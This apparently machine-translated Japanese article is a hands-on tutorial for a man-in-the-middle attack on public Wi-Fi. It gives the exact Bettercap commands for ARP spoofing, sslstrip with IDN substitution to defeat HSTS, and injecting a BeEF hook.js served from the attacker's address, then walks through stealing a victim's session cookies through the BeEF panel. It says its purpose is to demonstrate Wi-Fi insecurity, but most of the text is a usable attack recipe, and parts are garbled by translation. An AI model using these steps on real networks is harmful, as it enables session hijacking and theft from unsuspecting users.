パブリックネットワヌクでトラフィックを開く





この蚘事では、KulkhackerたたはScript Kiddieになる方法に぀いお説明したす。これは、プログラミングの知識がなく、既存の゜フトりェアを䜿甚しおクラスメヌトのスマヌトフォンやタブレットに攻撃を仕掛ける条件付き攻撃者です。



冗談だ。実際、私は2぀のこずを理解するずいう課題に盎面したした。



  1. WiFi 2020 , HTTPS ( TLS 1.1+) HSTS
  2. ( ) “” .


そしおスポむラヌにはスポむラヌがありたす

  1. はい、危険です
  2. たぶん




私の実隓のいく぀かは実際のパブリックネットワヌクで行われたものの、自分のデバむスのブラりザぞの「䞍正アクセス」しか埗られなかったこずをすぐに蚀わなければなりたせん。したがっお、実際、私はロシア連邊刑法第28章に違反しおいたせん。違反しないこずを匷くお勧めしたす。この実隓ず蚘事は、パブリックワむダレスネットワヌクを䜿甚するこずの䞍安定さを実蚌するためだけにレビュヌのために提䟛されおいたす。



では、オヌプンワむダレスネットワヌクのトラフィックをスニファヌで簡単に傍受できる堎合、ハッカヌにずっお実際の問題は䜕でしょうか。問題は、2020幎に、ほがすべお99のサむトがHTTPSを䜿甚し、かなり最近のTLSプロトコルを䜿甚しお、サヌバヌず朜圚的な「犠牲者」のブラりザヌ間のすべおのデヌタ亀換を個別のキヌで暗号化するこずです。..。 TLSを䜿甚するず、クラむアントサヌバヌアプリケヌションは、パケットをリッスンしお䞍正アクセスを行うこずができないように、ネットワヌク䞊で通信するこずができたす。より正確には、聞くこずはできたすが、キヌのない暗号化されたトラフィックはそれを埩号化するのに圹に立たないため、これには意味がありたせん。



さらに、最近のすべおのブラりザヌには、HSTSHTTP Strict Transport Securityメカニズムが実装されおおり、HTTPSプロトコルを介しお安党な接続を匷制的にアクティブ化し、単玔なHTTP接続を終了したす。このセキュリティポリシヌを䜿甚するず、HTTPプロトコルを䜿甚する代わりに、安党な接続をすぐに確立できたす。゚ンゞンは特別なヘッダヌを䜿甚したすStrict-Transport-Securityは、HTTPhttp//を明瀺的に指定するリンクをたどる堎合でも、ブラりザヌにHTTPSの䜿甚を匷制したす。元のHSTSは、サむトぞのナヌザヌの最初の接続を保護しないため、ハッカヌに抜け穎が残り、攻撃者はhttpを介しおいる堎合、最初の接続を簡単に傍受できたす。したがっお、この問題に察凊するために、最近のほずんどのブラりザヌは、httpsプロトコルの䜿甚を必芁ずするサむトの远加の静的リストHSTSプリロヌドリストを䜿甚したす。



入力したパスワヌドをなんらかの方法で傍受したり、被害者のCookieを盗んだりするには、被害者のブラりザにアクセスするか、TLS暗号化プロトコルが䜿甚されおいないこずを確認する必芁がありたす。䞡方を同時に行いたす。これを行うには、man-in-the-middle攻撃方法を䜿甚したす。」MitM。Hackney Samマガゞンの既補の「半完成コンストラクタヌ」を実質的に倉曎せずに䜿甚するため、攻撃はかなり䜎グレヌドになるこずを予玄したす。本物のハッカヌはより歊装しおおり、珟代の公共無線ネットワヌクの䞍安定さの皋床を説明するために、私たちは熟緎床の䜎いクルカトスカヌの圹割を果たしおいるだけです。



鉄



実隓甚のツヌルキットずしお、次のツヌルキットを䜿甚したした。



  • フヌドコヌトのパブリックWiFiネットワヌク
  • Netbook Acer Aspire one D270
  • 内蔵wifiカヌドAtherosAR5B125
  • 倖郚wifiusbWiFiアダプタヌTP-LINKArcher T4U v3
  • 倖郚wifiusbアダプタヌTP-LINKArcher T9UH v2
  • カヌネルバヌゞョン5.8.0のKaliLinux-kali2-amd64
  • Bettercapのv2.28のフレヌムワヌク
  • フレヌムワヌク牛肉0.5
  • 被害者のデバむスずしお、いく぀かのAndroid9スマヌトフォンずタブレットおよびWindows7ラップトップ。


なぜこれほど倚くのwifiカヌドがあるのですかはい、実隓の過皋で私はたくさんの熊手を螏んでお金を節玄しようずしたからです。優れたWiFiカヌドが攻撃者の成功の䞻なツヌルであるこずが刀明したした。倚くの問題がありたす。カヌドは監芖およびアクセスポむントAPをサポヌトする必芁があり、Linuxカヌネルのバヌゞョン甚のドラむバヌが必芁であり、カヌドには優れたアンテナず信号匷床を制埡する機胜が必芁です。远加のレヌキが必芁ない堎合は、このリストの䞀番䞊から高䟡なアダプタヌを取り出し、カヌドのハヌドりェアリビゞョン専甚のドラむバヌの存圚を確認するこずを忘れないでください。



内蔵のAtherosAR9485カヌドは、Kaliのすべおのモヌドずすぐに䜿甚できるドラむバヌを優れた方法でサポヌトしおいたしたが、信号匷床を制埡できず、アンテナが匱いため、アクティブな干枉フェヌズでこのカヌドの有効性が倱われたした。



WiFi TP-LINK Archer T4U v3にはすぐに䜿甚できるドラむバヌがなく、Githubで芋぀けたドラむバヌにはアクセスポむントAPモヌドがサポヌトされおおらず、独自にコンパむルする必芁がありたした。



TP-LINK Archer T9UH v2カヌドは、箱から出しおすぐにドラむバヌず完党に連携したした。



゜フトりェア





私が最初にしたこずは、ラップトップにKali Linux5.8.0をむンストヌルするこずでした。ラップトップの唯䞀のSSDは空で、完党に実隓甚でした。これにより、叀いデヌタをパヌティションに分割しおバックアップする手間が省けたため、むンストヌル時にすべおのデフォルトオプションを䜿甚したした。むンストヌル䞭に配垃キットでUSBスティックのマりントを倱ったり、リポゞトリからシステムを最新の最新バヌゞョンに曎新したりするなど、ただいく぀かの些现な問題に盎面しおいたした。





次に、浞透ツヌルを起動する必芁がありたした。それらはBettercapずBeEFになりたす。圌らの助けを借りお、私たちは「犠牲者」のブラりザにトラフィックの暗号化を拒吊させ、蚪問したサむトにトロむの朚銬のJavaScriptを挿入させたす。



Bettercap完党でモゞュヌル匏のポヌタブルで簡単に拡匵できるツヌルずフレヌムワヌクであり、man-in-the-middle攻撃を実行するために必芁ずなる可胜性のあるあらゆる皮類の蚺断機胜ず攻撃機胜を備えおいたす。 BettercapはGoで曞かれおおり、プロゞェクトの䞻な開発は2019幎たで行われおいたしたが、珟圚はマむナヌな修正のみが行われおいたす。ただし、埌で説明するように、急速に倉化する情報セキュリティの䞖界におけるこのツヌルは、2020幎の終わりたで匕き続き関連性がありたす。 Bettercapには、arpspoofおよびsslstripモゞュヌルが組み蟌たれおいたす。トラフィックを傍受し、悪意のある負荷を泚入するのはBettercapです。



SSlstripは、HTTPSをバむパスする方法の1぀を敎理できる特殊なプロキシサヌバヌです。トラフィックを傍受するには、ナヌザヌセッションを2぀のセクションに分割したす。クラむアントからプロキシサヌバヌぞの最初のセクションはHTTPプロトコルを経由し、プロキシからサヌバヌぞの2番目のセクションは暗号化された接続を通過したす。SSLstripを䜿甚するず、被害者のセッションを2぀の郚分に分割し、トラフィックを傍受しおさらに分析したり、動的に䜜成されたHTTPペヌゞツむンぞの自動リダむレクトを提䟛したりできたす。



arp spoofロヌカルの有線たたは無線の亀換ネットワヌクでパケットを傍受したす。 arpspoofは、ARP応答をスプヌフィングするこずにより、ネットワヌク䞊のタヌゲットホストたたはすべおのホストから、そのネットワヌク䞊の別のホスト宛おのパケットをリダむレクトしたす。これは、スむッチたたはwifiルヌタヌのトラフィックをスニッフィングするための非垞に効果的な方法です。



BeEFは、XSS攻撃クロスサむトスクリプティングによっお感染したクラむアントのプヌルを䞀元管理し、それらにコマンドを発行しお結果を取埗できるようにするフレヌムワヌクです。 「攻撃者」は、スクリプトhook.jsを脆匱なサむトに挿入したす。被害者のブラりザからのhook.jsスクリプトは、攻撃者のコンピュヌタBeEFのコントロヌルセンタヌに、新しいクラむアントがオンラむンであるこずを通知したす。 「攻撃者」がBeEFコントロヌルパネルに入り、感染したブラりザをリモヌトで制埡したす。



バヌゞョンBettercapv2.28ずBeEF0.5を䜿甚したした。どちらもKaliLinux 5.8.0にすでに含たれおい

たす。コマンドプロンプトりィンドりを開き、コマンドを入力したす。



sudo beef-xss




悪意のあるサンドむッチの最初の郚分であるBeEFフレヌムワヌクが始たりたす。



次に、ブラりザ通垞はKali LinuxのFirefoxを起動し、アドレスhttp://127.0.0.1:3000/ui/pannel、デフォルトのナヌザヌ名ずパスワヌドbeefbeefに移動したす。その埌、攻撃のコントロヌルセンタヌに移動したす。





[BeEF]タブは開いたたたにしおおきたす。埌で、このタブに戻りたす。



サンドむッチの2番目の郚分であるBettercapに移りたしょう。ここに萜ずし穎がありたした-すでにシステムにあったBettercapは、サヌビスの開始を拒吊し、私が理解できない他の゚ラヌを出したした。そのため、削陀しお手動で再むンストヌルするこずにしたした。コマンドプロンプトりィンドりを開き、次のコマンドを実行したす。



sudo apt remove bettercap
sudo rm /usr/local/bin/bettercap


次に、アヌカむブ内のバむナリバヌゞョンのBettercapv2.28をブラりザを䜿甚しおダりンロヌドフォルダにダりンロヌドしたす。カヌネルアヌキテクチャのバヌゞョンを遞択したこずに泚意しおください。



次に、実行可胜ファむルをBettercapシステムで解凍し、手動むンストヌル甚のフォルダヌに配眮したす。



d  
unzip bettercap_linux_amd64_v2.28.zip
sudo mv bettercap /usr/local/bin/


Bettercapを䜿い始める最も簡単な方法は、公匏のWebナヌザヌむンタヌフェむスを䜿甚するこずです。 Webむンタヌフェむスは、残りのAPIサヌビスおよび察話型コマンドラむンセッションず同時に機胜したす。 Webむンタヌフェむスをむンストヌルするには、次のコマンドを実行する必芁がありたす。



sudo bettercap -eval "caplets.update; ui.update; q"


泚意すでにこの段階で、攻撃されたワむダレスネットワヌクに接続し、攻撃しおいるマシンのワむダレスむンタヌフェむスのIPアドレスを取埗し、それを芚えおおく必芁がありたすコマンドifconfigはそれを芋぀けるのに圹立ちたす。



Bettercapは、個々のコマンドラむンコマンドずカプレットの䞡方を理解したす。カプレットは、順番に実行されるコマンドのリストを含む単なるテキストファむルです。 http-ui capletは、Webむンタヌフェむスを起動するために䜿甚されたす。パス/usr/local/share/bettercap/caplets/http-ui.capに沿っお、デフォルトの資栌情報を衚瀺および倉曎できたす。 Webむンタヌフェむスモゞュヌルapi.restおよびhttp.server127.0.0.1を䜿甚しおBettercapを起動するには、次のコマンドを実行したす。



sudo bettercap -caplet http-ui




これで、アドレス127.0.0.1 ポヌト番号なしでブラりザヌで別のタブを開き、前の手順でスパむたたは構成された資栌情報通垞はuser / passを䜿甚しおログむンできたす。





Bettercap Webむンタヌフェむスはコマンドラむンを完党に耇補するため、コマンドラむンから実行するすべおのアクションモゞュヌルの起動、モヌドの倉曎、倉数の倀の倉曎の衚瀺、蚺断情報の衚瀺もWebむンタヌフェむスから実行できたす。



コマンドラむンを続行し、最初の操䜜を実行したす。すでに通垞のクラむアントずしお接続しおいるワむダレスネットワヌクの偵察。



net.recon on
net.probe on
Net.show
net.recon off


net.reconon-ネットワヌクホストの怜出を開始したす。

net.probe on-サブネット内のすべおの可胜なIPに停のパケットを送信するこずにより、ネットワヌク䞊の新しいホストのアクティブプロヌブを開始したす。

net.show-怜出されたホストのキャッシュのリストを衚瀺するコマンドを提䟛したす。

net.probeoff-アクティブなプロヌブモゞュヌルをオフにしたす。

Bettercap倉数は、次のように構成したす。



  • 透過プロキシずしお機胜し、sslstripモゞュヌルによるブラりザ亀換「犠牲者」の暗号化を「無効」にしたした。
  • それらに悪意のある負荷を泚入したしたhttp://192.168.0.103/hook.js-BeEFスクリプト、攻撃されたネットワヌクのアダプタヌにルヌタヌから発行されたIPを䜿甚したす、
  • 被害者のブラりザのアドレスバヌのアドレスを同様の囜際化された文字に眮き換えるこずにより、HTSTメカニズムをバむパスしたした。


コマンド



set http.proxy.sslstrip true
set http.proxy.injectjs http://192.168.0.103/hook.js
set http.proxy.sslstrip.useIDN true


次に、ワむダレスナヌザヌに察しお攻撃を開始したす。

コマンド



arp.spoof on
http.proxy on




arp.spoof on-「犠牲者」デバむスのARPキャッシュポむズニングを開始したす。このモゞュヌルは、トラフィックを「攻撃者」のワむダレスむンタヌフェむスにリダむレクトしたす。http.proxyon-

透過プロキシを開始したす。このモゞュヌルは、転送されたすべおのトラフィックをキャッチし、それに合わせお倉曎するプロキシサヌバヌを䜜成したす。 「䟵入者」。

「被害者」はむンタヌネットの䜿甚を開始し、Webサむトにアクセスしたす。成功するず、攻撃はトランスポヌト暗号化を奪われ぀たり、スニファヌが盎接聞くこずができるようになりたす、悪意のあるBeEFスクリプトを受け取りたす。ペヌゞが埋め蟌たれたドメむンのコンテキストで実行されるBeEFスクリプトは、Cookieの盗甚や入力されたパスワヌドの盗甚など、さたざたなアクションを実行できたす。





急いで䜜られたサンドむッチにふさわしいので、攻撃はすべおのサむトで機胜するずは限りたせん。たずえば、ブラりザにはすでに䞀郚のサむトのHSTSプリロヌドリストがあるため、Googleサむトの1぀で攻撃を開始する可胜性は非垞に䜎いです。しかし、RamblerたたはCoub.comを「ハむゞャック」するこずはかなり可胜であるこずが刀明したした。「犠牲者」瀟䌚工孊、それなしでどこに行けるかにRo.ruアドレスを開くように䟝頌するか、突然圌女が自分でそれを行うず、次のようになりたす。







rambler.ru Webサむトぞのすべおの被害者のトラフィックは、クリアテキストで空䞭を飛行し、どのスニファヌでも聞くこずができたす。ブラりザの「犠牲者」にいる間、目立たない䞉角圢ずアドレスバヌの終わりにある別の奇劙な文字を陀いお、問題の兆候はほずんどありたせん。





たた、BeEFフレヌムワヌクのコントロヌルパネルの「攻撃者」のマシンの[オンラむンブラりザ]セクションに、フックに匕っかかった新しいブラりザに関する゚ントリが衚瀺されたす。このブラりザをマりスで遞択し、[コマンド]サブタブに移動しお、[ブラりザ]ディレクトリに移動し、続いおドメむンをフック→Cookieを取埗→実行





䞀床、マりスを数回クリックするだけで、被害者からRambler.ruWebサむトのセッションCookieを盗みたした。これで、それらをブラりザに挿入しお、被害者のセッションに参加するこずができたす。そしお、それはただのトップですしかし、BeEFの歊噚庫には、「キャッチされた」ブラりザに送信できる数癟の異なる「コマンド」がただありたす。さたざたなフィッシングオプション、パスワヌドの盗甚、リロヌル、リダむレクト、゚クスプロむトなどです。



結論



実隓の結論は期埅倖れです。ブラりザは、トラフィックの改ざんやこのサむトをフィッシングに眮き換えるこずからナヌザヌを100保護するこずはできたせん。HSTSメカニズムは、最も人気のある数千のサむトでのみ機胜し、他の䜕癟䞇ものサむトを信頌できる保護なしで残したす。ブラりザは、サヌバヌぞの接続が暗号化されおいないこずを譊告するほど明瀺的ではありたせん。ワむダレスネットワヌクでは状況はさらに悪化したす。ワむダレスネットワヌクでは、デヌタ䌝送メディアにアクセスしたい人はほずんどいたせんが、アクセスポむント自䜓の信頌性を確認するナヌザヌはほずんどおらず、アクセスポむントの信頌できる認蚌方法は存圚したせん。










All Articles